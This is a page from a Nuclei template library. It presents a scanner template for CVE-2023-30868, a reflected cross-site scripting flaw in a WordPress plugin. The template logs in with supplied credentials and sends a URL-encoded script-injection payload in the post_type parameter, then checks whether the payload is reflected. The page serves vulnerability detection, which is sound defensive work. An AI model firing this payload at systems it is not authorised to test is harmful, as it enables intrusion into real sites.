Skip to content
Nuclei Templates

Tree Page View Plugin < 1.6.7 - Cross-Site Scripting

ID: CVE-2023-30868

Severity: medium

Author: r3Y3r53

Tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project

Description

Section titled “Description”

The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.

YAML Source

Section titled “YAML Source”
id: CVE-2023-30868


info:
  name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
  reference:
    - https://www.exploit-db.com/exploits/51507
    - https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30868
    - http://packetstormsecurity.com/files/172730/WordPress-Tree-Page-View-1.6.7-Cross-Site-Scripting.html
    - https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-30868
    cwe-id: CWE-79
    epss-score: 0.00114
    epss-percentile: 0.44861
    cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cms_tree_page_view_project
    product: cms_tree_page_view
    framework: wordpress
  tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a004830460221009c343bfefc9cb5d89a0ad6676c3fd6dc3c1ae3740fc51a064de61cb8eaed4e47022100caa06f09f383d56538622557ecfc1f2a57034e9ab7b940a2a53082695213f2c5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30868.yaml"

View on Github